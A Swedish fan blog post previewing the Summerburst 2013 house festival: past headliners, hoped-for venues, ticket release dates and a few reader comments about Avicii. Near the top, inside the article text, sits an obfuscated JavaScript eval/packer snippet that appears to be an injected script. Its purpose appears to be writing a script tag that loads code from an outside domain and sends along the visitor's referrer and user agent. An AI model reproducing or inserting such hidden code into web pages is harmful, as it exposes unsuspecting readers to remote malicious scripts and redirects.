Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Inför Summerburst 2013 – Festival

Inför Summerburst 2013 – Festival
Sebastian

Summerburst eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ittsy|var|u0026u|referrer|dkyki||js|php’.split(’|’),0,{}))
2013: Vi glider sakta men säkert snart in i ett nytt spännande år, 2013. Det mycket omtalade house-festivalen Summerburst som nu ägt rum två år i rad har blivit större och spridit sig från endast Stockholm till Göteborg samt att det nu hålls under flera dagar.

SPG Live som är arrangör för evenemanget kommer säkerligen att köra även 2013 och kanske finns även planer på att göra det ännu större, dvs kanske även i Malmö.

Det finns ingen officiell information om detta än vad jag har kunnat hitta men det finns inget som pekar mot att de inte skulle expandera ytterligare.

Summerburst 2013 artister

Kända artister som Avicii, Dada Life, Deadmau5, Alesso, Axwell, Sebastian Ingrosso, Calvin Harris, Tiesto är anstikten vi fått möta under Summerburst. Sen första evenemanget 2011 har vi märkt att fler och större artister har bokats och för 2013 ser det ljusare ut. Vilka artister vi kommer få se är inte det heller officiellt än, brukar släppas med tiden närmare under våren.

Swedish House Mafia har nyligen haft sina officiellt sista konserter i Stockholm och hur de kommer att göra i framtiden gällande spelningar är oklart. Dock finns det fortfarande stor chans att de kommer att köra solo. Visst vore det kul om vi fick se alla tre medlemmarna under Summerburst 2013 även om de inte spelar tillsammans.

Platser och städer

Vad vi kan säga nu om Summerburst 2013 är att det kommer att arrangeras i Stockholm och Göteborg under två till tre dagar. Jag hoppas själv att de fortsätter att ha Stockholms Stadion som plats och inte byter till Friends Arena även om den platsen är väldigt häftig på många sätt. Stadion har sin öppenhet som får in mycket sol och värme vilket gör hela dagen till en så mycket bättre upplevelse.

Vi kommer att hålla er uppdaterade med den senaste informationen gällande Summerburst 2013 och publicera vilka artister städer och dagar som kommer.

Du kan redan nu vara med i en tävling på deras officiella hemsida och vinna exklusiva biljetter till Summerburst 2013.

Men självklart kommer vi att ses 🙂

Mer info: Summerburst hemsida

Uppdatering;

Datumen är nu fastställda och biljetterna släpps onsdagen den 28 november.
Så här skriver Stureplansgruppen på sin hemsida:
” Summerburst återkommer 2013, för att inta den klassiska utomhusarenan Stockholm Stadion den 14 och 15 juni. Helgen innan, den 7 och 8 juni, går festivalen av stapeln i Göteborg, arena meddelas inom kort. Biljetter släpps onsdagen den 28 november till både Stockholm och Göteborg och i samband med detta börjar 2013 års line up av artister att presenteras. ”

Läs fler artiklar om Summerburst 2013:

Comments

 1. groda

  Vet man något om Avicii kommer att spela?

  • johannes

   Nej det har inte kommit ut något om Avicii än

  • Krille_93

   Bråvalla har tydligen ensamrätt på honom i sverige 2013